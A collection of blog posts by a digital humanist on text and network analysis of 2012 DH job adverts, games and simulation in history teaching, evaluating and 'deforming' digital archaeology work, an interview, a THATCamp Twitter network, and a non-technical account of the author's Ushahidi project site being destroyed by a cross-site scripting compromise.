Text Analysis of 2012 Digital Humanities Job Adverts part 2

digital-humanities-jobsIf we look at simple word frequencies in the 2012 job advertisement documents for Digital Humanities, we find these top words and raw frequency counts:

research    650
university    577
experience    499
library            393
work            334
information    303
position    299
project            269
applications    257

(I’ve deleted ‘digital’ and ‘humanities’ from this list).

If job advertisements are a way of signalling what an institution hopes the future will hold, one gets the sense that the focus of digital humanities work will be on projects, on research, in conjunction with libraries. But we can extract more nuance, using network analysis. You can feed the texts into Voyant’s ‘RezoViz’ tool, which extracts paired nouns in each document.

This can be outputted as a .net file, and then imported into Gephi. The resulting graph has 1461 nodes, and 20649 edges. Of course, there are some duplicates (like ‘US’ and ‘United States’), but this is only meant to be rough and ready, ‘generative‘, as it were (and note also that a network visualization is not necessary for the analysis. So no spaghetti balls. What’s important are the metrics). What I’d like to find out are what concepts are doing the heavy lifting in these job advertisements? What is the hidden structure of the future of digital humanities, as evidenced by job advertisements in the English speaking world?

My suspicion is that ‘modularity’ aka ‘community detection’, and ‘betweeness centrality’, are going to be the key metrics for figuring this out. Modularity groups nodes on the basis of shared similar local patternings of ties (or, to put it another way, it decomposes the global network into maximal subnetworks). Seth Long recently did some network analysis on the Unabomber’s manifesto, and lucidly explains why betweeness centrality is a useful metric for understanding semantic meaning: “A word with high betweenness centrality is a word through which many meanings in a text circulate.” In other words, the heavy lifters.

So let’s peer into the future.

I ended up with about 15 groups. The first three groups by modularity account for 75% of the nodes, and 80% of the ties. These are the groups where the action lies. So let’s look at words with the highest betweenness centrality scores for those first three groups.

The first group

METS (Metadata encoding and transmission standard)
United States
New York

‘University’ is not surprising, and not useful. So let us discard it and bring in the next highest word:


This one group by modularity also has all of the highest betweenness centrality scores – and it reads like a laundry list of the skills a budding DH practitioner must hold. The US, and New York would seem to be the centre of the world, too.

If we take the next ten words, we get:

MODS (Netadata Object Description Schema)
University Libraries
CLIR (Council on Library and Information Resources)
University of Alberta
North America
Duke University

Again, skills and places figure – in Canada, U of A appears. So far, the impression is that DH is all about text, markup, and metadata. Our favorite programming languages are python and ruby. We use php, xhtml, xml, and drupal (plain-jane vanilla html eventually turns up in the list, but it’s buried very, very deep.).

So that’s an impression of the first group. (Remembering that groups are defined by patterns of similarity in their linkages).

The Second Group

The next group looks like this:
Digital Humanities
Department of Digital Humanities
Department of History

“digital humanities” is probably not helpful, so let’s eliminate that and go one more down: “US”. Indeed, let’s take a look at the next ten, too:

Human Resources
Computer Science
Head of School
Faculty of Humanities
University of Amsterdam

Here, we’re dealing very much with a UK, Ireland, and European focus. The ‘BCE’ is telling, for it suggests an archaeological focus in there, somewhere (unless this is some new DH acronym of which I’m not aware; I’m assuming ‘before the common era’).

The Third Group

In the final group we’ll consider here, we find a strong Canadian focus:

CRC (Canada Research Chair)
TEI (Text Encoding Initiative)
Canada Research Chair
Digital Humanities Summer Institute
University of Victoria

Since we’ve got some duplication in here, let’s look at the next ten:

ETCL (Electronic Textual Cultures Laboratory, U Victoria)
University of Waterloo
DHSI (Digital Humanities Summer Institute)
Faculty of Arts
Stratford Campus

‘Canada Research Chairs’ are well-funded government appointments, and so give an indication of where the state would like to see some research. Victoria continually punches above its weight, with look ins from Waterloo and Concordia.

So what have we learned? Well, despite the efforts of the digital history community, ‘digital humanities’ is still largely a literary endeavor – although it’s quite possible that a lot of the marking up that these job advertisements might envision could be of historical documents. Invest in some python skills (see Programming Historian). My friends in government tell me that if you can data mine, you’ll be set for life, as the government is looking for those skills. (Alright, that didn’t come out in this analysis at all, but he’s looking over my shoulder right now).

Finally – London, Dublin, New York, Edmonton, Victoria, Waterloo, Montreal – these seem to be the geographic hotspots. Speaking of temperature, Victoria has the nicest weather. Go there, young student!

Or come to Carleton and study with me.  We’ve got tunnels.

update March 4th: jobs-topics-dh as a network graph IN the analysis above, I’ve generated a network using Voyant’s RezoViz tool. Today, I topic modelled all of the texts looking for 10 topics. So a slightly different approach. I turned the resulting document composition (ie doc 1 is 44% topic 1, 22% topic 4, 10% topic 3, etc) into a two mode graph, job advert to top two constituent topics. I then turned this into a 1 mode graph where job adverts are tied to other job adverts based on topic composition. Then I ran modularity, and found 3 groups by modularity; edges are percent composition by topics discerned through topic modeling.Nodes are ‘betweenness centrality’. Most between? George Mason University. I’m not sure what ‘betweenness centrality’ means though in this context, yet.

Makes for interesting clusters of job adverts. Topic model results to be discussed tomorrow.

Text analysis of 2012 Digital Humanities Job Adverts


2012 was a good year for hirings in the digital humanities. See for yourself at this archive of DH jobs: http://jobs.lofhm.org/ Now: what do these job adverts tell us, if you’re a graduate student trying to find your way?

Next week, I’m speaking to the Underhill Graduate Students’ Colloquium at Carleton University on ‘Living the life electric: becoming a digital humanist’. It’s broadly autobiographical in that I’ll talk about my own idiosyncratic path into this field.

That’s quite the point: there’s no firm/accepted/typical/you-ought-to-do X recipe for becoming a digital humanist. You have to find your own way, though the growing body of courses, books, journals, blog-o-sphere and twitterverse certainly makes a huge difference.

But in the interests of providing perhaps a more satisfying answer, I’ll try my hand at data mining those job posts (some 150 of them) using Voyant and MALLET to see what augurs for the future of the field.

Feel free to explore the corpus uploaded into Voyant. In any graphs you produce, January is on the left, December is on the right. If you spot anything interesting/curious, let me know.

And, because word counts are amazing:

Word Count
digital 1082
research 650
university 577
experience 499
library 393
humanities 386
work 334
information 303
position 299
project 269
applications 257
new 223
faculty 222
development 216
collections 210
department 207
management 206
projects 195
knowledge 192
data 187
including 185
ability 182
services 180
teaching 180
history 177
libraries 176
skills 176
qualifications 172
technology 169
required 166
media 163
jobs 151
application 149
original 146
program 145
link 143
web 143
working 142
loading 140
related 140
staff 138
academic 137
communication 133
job 132
college 130
degree 127
professor 126
education 125
students 125
studies 123

Why I Play Games

(originally posted at #HIST3812, my course blog for this term’s History3812: Gaming and Simulations for Historians, at Carleton University).

I play because I enjoy video games, obviously, but I also get something else out of it.  Games are a ‘lively art’; they are an expressive art, and the artistry lies in encoding rules (descriptions) about how the world works at some microlevel: and then watching how this artistry is further expressed in the unintended consequences of those rules, their intersections, their cancellations, causing new phenomena to emerge.

This strikes me as the most profound use of humanities computation out there. Physicists tell us that the world is made of itty bitty things that interact in particular ways. In which case, everything else is emergent: including history. I’m not saying that there are ‘laws’ of human action; but we do live in this universe. So, if I can understand some small part of the way life was lived in the past, I can model that understanding, and explore the unintended outcomes of that understanding… and go back to the beginning and model those.

I grew up with the video game industry. Adventure? I played that. We had a vic-20 . If you wanted to play a game, you had to type it in yourself. There used to be a magaine (Compute!) that would have all of the code printed within, along with screenshots. Snake, Tank Wars – yep. My older brother would type, and I would read the individual letters (and spaces, and characters) out. After about a week, we’d have a game.

And there would be bugs. O lord, there were bugs.

When we could afford games, we’d buy text adventures from Infocom. In high school, my older brother programmed a quiz game as his history project for the year. Gosh, we were cool. But it was! Here we were, making the machine do things.

As the years went on, I stopped programming my own games. Graphics & technology had moved too fast. In college, we used to play Doom (in a darkened room, with the computer wired to the stereo. Beer often figured). We played SimCity. We played the original Civilization.

These are the games that framed my interactions with computers. Then, after I finished my PhD, I returned to programming when I realized that I could use the incredible artificial intelligences, the simulation engines, of modern games, to do research. To enhance my teaching.

I got into Agent Based Modeling, using the Netlogo platform. This turned my career around: I ceased to be a run-of-the-mill materials specialist (Roman archaeology), and became this new thing, a ‘digital humanist’. Turns out, I’m now an expert on simulation and history.

Cool, eh?

And it’s all down to the fact that I’m a crappy player of games. I get more out of opening the hood, looking at how the thing works. Civilization IV and V are incredible simulation engines. So: what kinds of history are appropriate to simulate? What kinds of questions can we ask? That’s what I’m looking forward to exploring with you (and of course, seeing what you come up with in your final projects).

But maybe a more fruitful question to start with, in the context of the final project of this course, is, ‘what is the strangest game you’ve ever played?’

What made it strange? Was it the content, the mechanics, the interface?

I played one once where you had to draw the platform with crayons, and then the physics engine would take over. The point was to try to get a ball to roll up to a star. Draw a teeter-totter under the star, and perhaps the ball would fall on it, shooting the star up to fall down on the ball, for instance. A neat way of interacting with the underlying physics of game engines.

I’d encourage everyone to think differently about what the games might be. For instance, I could imagine a game that shows real-time documents (grabbed from a database), and you have to dive into it, following the connected discourses (procedurally generated using topic models and network graphing software to find these – and if this makes no sense to you, take a quick peek at the Programming Historian) within it to free the voices trapped within…

This is why I play. Because it makes me think differently about the materials I encounter.

Evaluating Digital Work in the Humanities

https://i0.wp.com/projects.chass.utoronto.ca/amphoras/ills/sym99-f2.gifLeave it to an archaeologist, but when I heard the CFP from Digital Humanities Now on ‘evaluating’ digital work, I immediately started thinking about typologies, about categorizing. If it is desirable to have criteria for evaluating DH work, then we should know roughly the different kinds of DH work, right? The criteria for determining ‘good’ or ‘relevant’, or other indications of value will probably be different, for different kinds of work.

In which case, I think there are at least two dimensions, though likely more, for creating typologies of DH work. The first – let’s call it the Owens dimension, in honour of Trevor’s post on the matter- extends along a continuum we could call ‘purpose’, from ‘discovery’ through to ‘justification’. In that vein I was mulling over the different kinds of digital archaeological work a few days ago. I decided that the closer to ‘discovery’ the work was, the more it fell within the worldview of the digital humanities.

The other dimension concerns computing skill/knowledge, and its explication. There are lots of level of skill in the digital humanities. Me, I can barely work Git or other command-line interventions, though I’m fairly useful at agent simulation in Netlogo. It’s not the kinds of skills here I am thinking about, but rather how well we fill in the blanks for others. There is so much tacit knowledge in the digital world. Read any tutorial, and there’s always some little bit that the author has left out because, well, isn’t that obvious? Do I really need to tell you that? I’m afraid the answer is yes. “Good” work on this dimension is work that provides an abundance of detail about how the work was done so that a complete neophyte can replicate it. This doesn’t mean that it has to be right there in the main body of the work – it could be in a detailed FAQ, a blog post, a stand alone site, a post at Digital Humanities Q&A, whatever.

For instance, I’ve recently decided to start a project that uses Neatline. Having put together a couple of Omeka sites before, and having played around with adding plugins, I found that (for me) the documentation supporting Neatline is quite robust. Nevertheless, I became (am still) stumped on the problem of the geoserver to serve up my georectified historical maps. Over the course of a few days, I discovered that since Geoserver is java-based, most website hosting companies charge a premium or monthly charge to host it. Not only that, it needs Apache Tomcat installed on the server first, to act as a ‘container’. I eventually found a site – Openshift – that would host all of this for free (! cost always being an issue for the one-man-band digital humanist), but this required me to install Ruby and Git on my machine, then to clone the repository to my own computer, then to drop a WAR file (as nasty as it sounds) into the webapps folder (but what is this? There are two separate webapp folders!) , then ‘commit, push’ everything back to openshift. Then I found some tutorials that were explicitly about putting Geoserver on Openshift, so I followed them to the letter…. turns out they’re out of date and a lot can change online quite quickly.

If you saw any of my tweets on Friday, you’ll appreciate how much time all of this took…. and at the end of the day, still nothing to show for it (though I did manage to delete the default html). Incidentally, Steve from Openshift saw my tweets and is coaching me through things, but still…

So: an importance axis for evaluating work in the digital humanities is explication. Since so much of what we do consists of linking together lots of disparate parts, we need to spell out how all the different bits fit together and what the neophyte needs to do to replicate what we’ve just done. (Incidentally, I’m not slagging the Neatline or Omeka folks; Wayne Graham and James Smithies have been brilliant in helping me out – thank you gentlemen!).  The Programming Historian has an interesting workflow in this regard. The piece that Scott, Ian, and I put together on topic modelling was reviewed by folks who were definitely in the digital humanities world, but not necessarily well-versed in the skills that topic modeling requires. Their reviews, going over our step by step instructions, pointed out the many, many, places where we were blind to our assumptions about the target audience. If that tutorial has been useful to anyone, it’s entirely thanks to the reviewers, John Fink, Alan MacEachern, and Adam Crymble.

So, it’s late. But measure digital humanities work along these two axes, and I think you’ll have useful clustering in order to further ‘evaluate’ the work.

Deformative Digital Archaeology

An archaeological visualization.

Is digital archaeology part of the digital humanities?

This isn’t to get into another who’s in/who’s out conversation. Rather, I was thinking about the ways archaeologists use computing in archaeology, and to what ends. The Computer Applications in Archaeology Conference has been publishing proceedings since 1973, or longer than I’ve been on this earth. Archaeologists have been running simulations, doing spatial analysis, clustering, imaging, geophysicing, 3d modeling, neutron activation analyzing, x-tent modeling , etc, for what seems like ages.

Surely, then, digital archaeologists are digital humanists too? Trevor Owens has a recent post that sheds useful light on the matter. Trevor draws attention to the purpose behind one’s use of computational power – generative discovery versus justification of an hypothesis. For Trevor, if we are using computational power to deform our texts, we are trying to see things in a new light, new juxtapositions, to spark new insight. Ramsay talks about this too in Reading Machines (2011: 33), discussing the work of Jerome McGann and Lisa Samuels. “Reading a poem backward is like viewing the face of a watch sideways – a way of unleashing the potentialities that altered perspectives may reveal”. This kind of reading of data (especially, but not necessarily, through digital manipulation), does not happen very much at all in archaeology. If ‘deformance’ is a key sign of the digital humanities, then digital archaeologists are not digital humanists. Trevor’s point isn’t to signal who’s in or who’s out, but rather to draw attention to the fact that:

When we separate out the the context of discovery and exploration from the context of justification we end up clarifying the terms of our conversation. There is a huge difference between “here is an interesting way of thinking about this” and “This evidence supports this claim.”

This, I think, is important in the wider conversation concerning how we evaluate digital scholarship. We’ve used computers in archaeology for decades to try to justify or otherwise connect our leaps of logic and faith, spanning the gap between our data and the stories we’d like to tell. A digital archaeology that sat within the digital humanities would worry less about that, and concentrate more on discovery and generation, of ‘interesting way[s] of thinking about this’.

In a paper on Roman social networks and the hinterland of the city of Rome, I once argued (long before I’d ever heard the term digital humanities) that we should stop using GIS displaying North at the top of the map, that this was hindering our ability to see patterns in our data. I turned the map sideways – and it sent a murmur through the conference room as east-west patterns, previously not apparent, became evident. This, I suppose, is an example of deformation. Hey! I’m a digital humanist! But other digital work that I’ve been doing does not fall under this rubric of ‘deformation’.

My Travellersim simulation for instance uses agent based modeling to generate territories, and predict likely interaction spheres, from distributions of survey data. In essence, I’m not exploring but trying to argue that the model accounts for patterns in the data. This is more in line with what digital archaeology often does.

Archaeological Glitch Art, Bill Caraher

Bill Caraher, I suspect, has been reading many of the same things I have been lately, and has been thinking along similar lines. In a post on archaeological glitch art Bill has been changing file extensions to fiddle about in the insides of images of archaeological maps, then looking at them again as images:

“The idea of these last three images is to combine computer code and human codes to transform our computer mediate image of archaeological reality in unpredictable ways. The process is remarkably similar to analyzing the site via the GIS where we take the “natural” landscape and transform it into a series of symbols, lines, and text. By manipulating the code that produces these images in both random and patterned ways, we manipulate the meaning of the image and the way in which these images communicate information to the viewer. We problematize the process and manifestation of mediating between the experienced landscape and its representation as archaeological data.”

In the same way, Trevor uses augmented reality smartphone translation apps set to translate Spanish text into English, but pointed at non Spanish texts. It’s a bit like Mark Sample’s Hacking the Accident, where he uses an automatic dictionary substitution scheme (n+7, a favorite of the Oulipo group) to throw up interesting juxtapositions. A deformative digital archaeology could follow these examples. Accordingly, here’s my latest experiment along these lines.

Screen shot from the deformed Netlogo ‘Mimicry’ model

Let’s say we’re interested in the evolution of amphorae types in the Greco-Roman world. Let’s go to the Netlogo models library, and instead of building the ‘perfect’ archaeological model, let’s select one of their evolutionary models – Wilensky’s ‘Mimicry‘ model, which is about the evolution of Monarch and Viceroy butterflies swapping in ‘amphora’ for ‘moth’ everywhere in the code and supporting documentation, and ‘Greeks’ for ‘birds’.

In the original model code, we are told:

“Batesian mimicry is an evolutionary relationship in which a harmless species (the mimic) has evolved so that it looks very similar to a completely different species that isn’t harmless (the model). A classic example of Batesian mimicry is the similar appearance of monarch butterfly and viceroy moths. Monarchs and viceroys are unrelated species that are both colored similarly — bright orange with black patterns. Their colorations are so similar, in fact, that the two species are virtually indistinguishable from one another.

The classic explanation for this phenomenon is that monarchs taste desireable. Because monarchs eat milkweed, a plant full of toxins, they become essentially inedible to butterflies. Researchers have documented butterflies vomiting within minutes of eating monarch butterflies. The birds then remember the experience and avoid brightly colored orange butterfly/moth species. Viceroys, although perfectly edible, avoid predation if they are colored bright orange because birds can’t tell the difference.

This is what you get:

We have two types of amphorae here, which we are calling the ‘monarch’ type (type 1) and the ‘viceroy’ type (type 2).

This model simulates the evolution of monarchs and viceroys from distinguishable, differently colored types to indistinguishable mimics and models. At the simulation’s beginning there are 450 type 1s and type 2s distributed randomly across the world. The type 1s are all colored red, while the type 2s are all colored blue. They are also distinguishable (to the human observer only) by their shape: the letter “x” represents type 1s while the letter “o” represents type 2s. Seventy-five Greeks are also randomly distributed across the world.

When the model runs, the Greeks and amphorae move randomly across the world. When a Greek encounters a amphora it rejects the amphora, unless it has a memory that the amphora’s color is “desireable.” If a Greek consumes a monarch, it acquires a memory of the amphora’s color as desirable.

As amphorae are consumed, they are regenerated. Each turn, every amphora must pass two “tests” in order to reproduce. The first test is based on how many amphorae of that species already exist in the world. The carrying capacity of the world for each species is 225. The chances of regenerating are smaller the closer to 225 each population gets. The second test is simply a random test to keep regeneration in check (set to a 4% chance in this model). When a amphora does regenerate it either creates an offspring identical to itself or it creates a mutant. Mutant offspring are the same species but have a random color between blue and red, but ending in five (e.g. color equals 15, 25, 35, 45, 55, 65, 75, 85, 95, 105). Both monarchs and Viceroys have equal opportunities to regenerate mutants.

Greeks can remember up to MEMORY-SIZE desireable colors at a time. The default value is three. If a Greek has memories of three desireable colors and it encounters a monarch with a new desireable color, the Greek “forgets” its oldest memory and replaces it with the new one. Greeks also forget desireable colors after a certain amount of time.

And when we run the simulation? Well, we’ve decided that one kind of amphora is desireable, another kind is undesireable. The undesireable ones respond to (human) consumer pressure and change their color; over time they evolve to the same color. Obviously, we’re talking as if the amphorae themselves have agency. But why not? (and see Godsen, ‘What do objects want?’) That’s one interesting side effect of this deformation.

As I haven’t changed the code, so much as the labels, the original creator’s conclusions still seem apt:

Initially, the Greeks don’t have any memory, so both type 1 and type 2 are consumed equally. However, soon the Greeks “learn” that red is a desireable color and this protects most of the type 1s. As a result, the type 1 population makes a comeback toward carrying capacity while the type 2 population continues to decline. Notice also that as reproduction begins to replace consumed amphorae, some of the replacements are mutants and therefore randomly colored.

As the simulation progresses, Greeks continue to consume mostly amphorae that aren’t red. Occasionally, of course, a Greek “forgets” that red is desireable, but a forgetful Greek is immediately reminded when it consumes another red type 1. For the unlucky type 1 that did the reminding, being red was no advantage, but every other red amphora is safe from that Greek for a while longer. Type 1 (non-red) mutants are therefore apt to be consumed. Notice that throughout the simulation the average color of type 1 continues to be very close to its original value of 15. A few mutant type 1s are always being born with random colors, but they never become dominant, as they and their offspring have a slim chance for survival.

Meanwhile, as the simulation continues, type 2s continue to be consumed, but as enough time passes, the chances are good that some type 2s will give birth to red mutants. These amphorae and their offspring are likely to survive longer because they resemble the red type 1s. With a mutation rate of 5%, it is likely that their offspring will be red too. Soon most of the type 2 population is red. With its protected coloration, the type 2 population will return to carrying capacity.

The swapping of words makes for some interesting juxtapositions. ‘Protects’, from ‘consumption’? This kind of playful swapping is where the true potential of agent based modeling might lie, in its deformative capacity to make us look at our materials differently. Trying to simulate the past through ever more complicated models is a fool’s errand. A digital archaeology that sat in the digital humanities would use our computational power to force us to look at the materials differently, to think about them playfully, and to explore what these sometimes jarring deformations could mean.


Godsen, Chris. 2005. ‘What do objects want?’ Journal of Archaeological Method and Theory 12.3 DOI: 10.1007/s10816-005-6928-x

Ramsay, Stephen. 2011. Reading Machines. Towards An Algorithmic Criticism. U of Illinois Press.

Wilensky, U. (1997). NetLogo Mimicry model. http://ccl.northwestern.edu/netlogo/models/Mimicry. Center for Connected Learning and Computer-Based Modeling, Northwestern University, Evanston, IL.

Wilensky, U. (1999). NetLogo. http://ccl.northwestern.edu/netlogo/. Center for Connected Learning and Computer-Based Modeling, Northwestern University, Evanston, IL.

HIST3812, Gaming and Simulation for Historians

Finally, with a bit of space to breathe, I am turning to getting my HIST3812 Gaming and Simulation for Historians course put together. In response to student queries about what this course will explore, I’ve put together a wee comic book (to capture the aesthetic of playfulness about history that games & simulations naturally contain). I’m not a particularly good maker of comic books, but it does the trick, more or less.

See it on Issuu here

Digital Humanist Interview

I was interviewed recently by a student in Leslie Madsen-Brooks graduate seminar in digital history, HannaLore Hein. She posts her impression of the interview on the course website here. It’s always interesting to see what you wrote come through someone else’s filters. Given a recent conversation on twitter, where Mike Widner and others have been discussing the results of text analysis/topic modeling on all of the posted interviews, I thought I’d post here the ur-text from our interview.

1. Did you begin your academic career wanting to be an archeologist? How did your studies as and undergraduate and graduate student lead you to your current career?

I grew up in a family with a very strong interest in history. My brothers and I all teach at various levels in the system, and various aunts & other family members all taught too. It was rather a given… as for archaeology, I was attracted by the materiality of it. I love historical landscapes. Archaeology forces you to confront that history happens in space and place, with and through objects. I like stuff. It was a good fit!

But it all comes down to an opportunity I had a at junior college in Quebec (a CEGEP, as they’re called). I had the opportunity to go to Greece on a study tour, and then to return the following year on an excavation. We worked on a medieval Cistercian abbey, in which was buried a mutilated skeleton. Its treatment was consistent with traditions surrounding vampires, so… it rather hooks you in, an experience like that!

I studied classical archaeology at Wilfrid Laurier University in Waterloo Ontario. I wasn’t very tech minded in those days, though I had had a C-64 growing up, and had programmed my own games in BASIC. I had an exercise in one class in 1995 where we were asked to go onto this “World Wide Web” and create an annotated webography of sites related to the Etruscans. Less than impressed with what I found, I wrote an essay entitled, ‘Why the World Wide Web Will Never Be Useful For Academics’.

My ability to predict the future is thus suspect.

2. Did you always have a knack for technology? Was it something that came easily to you, or something you really had to work at to understand?

I’ve been breaking things since I was 3. I took our family piano apart when I was ten, dropping all of the hammers and rendering a B-Flat completely useless ever since. In the sense that I’ve never been afraid to tinker, to try to understand how things work, then yes, you could say I have a knack for technology. With our C-64, I use to buy magazines that printed out all of the code for games, utilities, and so on. I did a lot of that sort of thing, down in the basement… but I’m always working hard to figure out how things work, and what I might use them for. I get a kick out of helping other people too. I believe in failing gloriously and failing often. It’s only through that cycle – and being willing to share what happened – that we move forward. Recently a project website of mine was hacked. I was gutted – I lost a summer’s worth of work. But on the flip side, it was a great moment to share with the wider community so that it wouldn’t happen to them. I posted about it here: https://electricarchaeology.ca/2012/05/18/how-i-lost-the-crowd-a-tale-of-sorrow-and-hope/ and was really heartened to see the comments of support (and tweets) about what went on.

Too often we only talk about things that worked just like we thought they would. We need to have a discourse about things we try that didn’t – and why.

3. What jobs have you held previously? Were there any skills that you acquired at those positions that you still use today?

My very first job was as a janitor, responsible for the washrooms at a summer resort. Being a janitor taught patience and fortitude in the face of really annoying ….stuff….. More to your question though, I’ve taught at all levels from High School through to Continuing Ed. Until I joined the faculty at Carleton, I worked in the world of for-profit online education. I learned a lot about teaching and tech in those positions. I was a free lance heritage consultant at one point, with a couple of government contracts, where mission creep is a very real issue. Learn to say no, learn to draw the line. I also have a business with my family in what could be considered the heritage agritourism field.  Again though I consider that a form of teaching – understanding customers, understanding students, can be very similar. That’s not to say that students are customers, mind you. Paying for tuition is like paying for ice time- it gets you on the ice, I’ll coach you, but you don’t necessarily get to hoist the Stanley Cup.

4. How advanced is your knowledge of computer science and programing? Is that a major component of your job?

I’m always reading, always learning. Talk to the comp.sci folks. Keeping up with what’s going on, and trying to identify which skills are the ones I need. There’s a lot to recommend just playing and tinkering though, in terms of teaching. When you are formally taught something, you tend to internalize that particular mode of doing whatever it is. I’m sure there are probably more effective ways of learning the skills I need, but this is what seems to work for me. I’ve heard of people getting credit towards tenure for ‘learning python’ or what have you, so that’s encouraging. Works like The Programming Historian are a fantastic resource, and I’m continually astounded by what other folks can do. I’m really a bit of a fraud. First day in the department, I couldn’t find the on switch for the Macs…. (I’m a pc guy).

5. What is your favorite form of digital communication? (Blogs, Twitter, etc.) What form do you think is most respected in the field? What form is the most “academically accepted?”

I have worked hard on my blog, from 2006 onwards, to make it a useful form of academic output for me. I thank Alan Liu and other participants at the 1st Nebraska Digital Humanities Workshop (were I’d been invited to present) for pushing me to blog. Once I started giving it away on my blog, I started getting traction in academia (that I wasn’t getting as a Romanist). A careful, thoughtful blog is a sinequanon for the digital humanist, as is a twitter account. I don’t care much for Facebook or Google +. In terms of ‘academically accepted’, I can show you structural reasons why blogs matter in terms of speaking beyond and to the academy. Someone has to generate the content on the internet, right? Experiments like the Journal of Digital Humanities and things like the LSE Impact Blog are slowly securing the short-form quick-publish genre as an accepted format of scholarly output. Blogging is platform, not genre. We shouldn’t confuse the two. In some senses, the journal article or monography is the last stage of the process, an archive rather than a picture of developing scholarly output. That’s going to be the biggest change.

6. How do you balance your career/projects between the digital and traditional academic worlds?

Happily, I’m one of the first people in Canada to have ‘Digital Humanities’ as my job title, so I’m making it up as I go along.

7. I noticed on your blog that you cite extensively. Is that common practice among digital humanists?

Blogging as a platform has nothing to say about citations. I cite, because I want to give credit and to show where my original thought begins. It’s pretty common on academic blogs. Linking is a form of citation too.

If there is any other information that you think is pertinent to the field of digital humanities, especially in relation to public history, that I did not touch upon in my questions, I would love to hear your thoughts.

All digital history is public history, far as I’m concerned. Working online allows an interested public to become part of the project. Precious few have read my book; about a hundred people a day take a look at my blog.

Visualizing THATCamp

THATCamps are quite popular. I’m throwing one myself. But who are the people talking about them on Twitter? What does the THATCamp look like on the Twitterverse?

I used NodeXL to retrieve the data – a search for tweets, people, and the links between them. I then visualized the data in Gephi, where colour = community (per Gephi’s modularity routine) and sized the nodes (individual Twitterers) using Pagerank, on the premise that this was a directed graph and one should follow the links (although there was little difference with Betweeness Centrality. Major players are still major, either way).

I found 233 individuals, linked together by 4435 edges. Some general stats on this directed network:

Top 10 Vertices, Ranked by Betweenness Centrality Betweenness Centrality
thatcamp 10493.93299
marindacos 3381.65598
amandafrench 2530.589717
openeditionsays 2491.27153
inactinique 2183.450362
briancroxall 2093.876857
piotrr70 2014.064889
brettbobley 1798.013658
miriamkp 1693.203103
melissaterras 1596.42585


Top Replied-To in Entire Graph Entire Graph Count
colleengreene 4
thatcamp 3
rosemarysewart 2
normasalim 2
janaremy 2
spagnoloacht 1
chuckrybak 1
lawnsports 1
ncecire 1
academicdave 1
Top Mentioned in Entire Graph Entire Graph Count
thatcamp 25
piotrr70 25
briancroxall 17
ncecire 16
spouyllau 14
thtcmpfeminisms 10
marindacos 8
dhlib2012 8
thatcamprtp 7
goldstoneandrew 6
Top URLs in Tweet in Entire Graph Entire Graph Count
http://leo.hypotheses.org/9506 26
http://bit.ly/RyrPvA 19
http://tcp.hypotheses.org/609 19
http://tcp.hypotheses.org/programme 15
http://rtp2012.thatcamp.org/apply/ 12
http://bit.ly/w1IFmR 11
http://dhlib2012.thatcamp.org/register/ 10
http://goo.gl/qJ185 10
http://dhlib2012.thatcamp.org/ 8
http://bit.ly/RNHLKO 8
Top Hashtags in Tweet in Entire Graph Entire Graph Count
thatcamp 137
mla13 27
dh 22
tcp2012 17
thatcampsocal 12
dhlib2012 9
unconferences 7
thatcamptheory 6
digitalhumanities 6
tcny2012 6

And now the visualization. You can download the zoomable pdf here.

As I look at the modularity in this graph, at first blush, you can see quite a North America / European divide, with various satellite outposts. This could be of course because there’s a THATCamp Paris coming down the pipe (lots of French in the tweets).

How I Lost the Crowd: A Tale of Sorrow and Hope

Yesterday, my HeritageCrowd project website was annihilated. Gone. Kaput. Destroyed. Joined the choir.

It is a dead parrot.

This is what I think happened, what I now know and need to learn, and what I think the wider digital humanities community needs to think about/teach each other.

HeritageCrowd was (may be again, if I can salvage from the wreckage) a project that tried to encourage the crowdsourcing of local cultural heritage knowledge for a community that does not have particularly good internet access or penetration. It was built on the Ushahidi platform, which allows folks to participate via cell phone text messages. We even had it set up so that a person could leave a voice message and software would automatically transcribe the message and submit it via email. It worked fairly well, and we wrote it up for Writing History in the Digital Age. I was looking forward to working more on it this summer.

Problem #1: Poor record keeping of the process of getting things intalled, and the decisions taken.

Now, originally, we were using the Crowdmap hosted version of Ushahidi, so we wouldn’t have to worry about things like security, updates, servers, that sort of thing. But… I wanted to customize the look, move the blocks around, and make some other cosmetic changes so that Ushahidi’s genesis in crisis-mapping wouldn’t be quite as evident. When you repurpose software meant for one domain to another, it’s the sort of thing you do. So, I set up a new domain, got some server space, downloaded Ushahidi and installed it. The installation tested my server skills. Unlike setting up WordPress or Omeka (which I’ve done several times), Ushahidi requires the concommitant set up of ‘Kohana‘. This was not easy. There are many levels of tacit knowledge in computing and especially in web-based applications that I, as an outsider, have not yet learned. It takes a lot of trial and error, and sometimes, just dumb luck. I kept poor records of this period – I was working to a tight deadline, and I wanted to just get the damned thing working. Today, I have no idea what I actually did to get Kohana and Ushahidi playing nice with one another. I think it actually boiled down to file structure.

(It’s funny to think of myself as an outsider, when it comes to all this digital work. I am after all an official, card-carrying ‘digital humanist’. It’s worth remembering what that label actually means. At least one part of it is ‘humanist’. I spent well over a decade learning how to do that part. I’ve only been at the ‘digital’ part since about 2005… and my experience of ‘digital’, at least initially, is in social networks and simulation – things that don’t actually require me to mount materials on the internet. We forget sometimes that there’s more to the digital humanities than building flashy internet-based digital tools. Archaeologists have been using digital methods in their research since the 1960s; Classicists at least that long – and of course Father Busa).

Problem #2: Computers talk to other computers, and persuade them to do things.

I forget where I read it now (it was probably Stephen Ramsay or Geoffrey Rockwell), but digital humanists need to consider artificial intelligence. We do a humanities not just of other humans, but of humans’ creations that engage in their own goal-directed behaviours. As some one who has built a number of agent based models and simulations, I suppose I shouldn’t have forgotten this. But on the internet, there is a whole netherworld of computers corrupting and enslaving each other, for all sorts of purposes.

HeritageCrowd was destroyed so that one computer could persuade another computer to send spam to gullible humans with erectile dsyfunction.

It seems that Ushahidi was vulnerable to ‘Cross-site Request Forgery‘ and ‘Cross-site Scripting‘ attacks. I think what happened to HeritageCrowd was an instance of persistent XSS:

The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw: it occurs when the data provided by the attacker is saved by the server, and then permanently displayed on “normal” pages returned to other users in the course of regular browsing, without proper HTML escaping.

When I examine every php file on the site, there are all sorts of injected base64 code. So this is what killed my site. Once my site started flooding spam all over the place, the internet’s immune systems (my host’s own, and others), shut it all down. Now, I could just clean everything out, and reinstall, but the more devastating issue: it appears my sql database is gone. Destroyed. Erased. No longer present. I’ve asked my host to help confirm that, because at this point, I’m way out of my league. Hey all you lone digital humanists: how often does your computing services department help you out in this regard? Find someone at your institution who can handle this kind of thing. We can’t wear every hat. I’ve been a one-man band for so long, I’m a bit like the guy in Shawshank Redemption who asks his boss at the supermarket for permission to go to the bathroom. Old habits are hard to break.

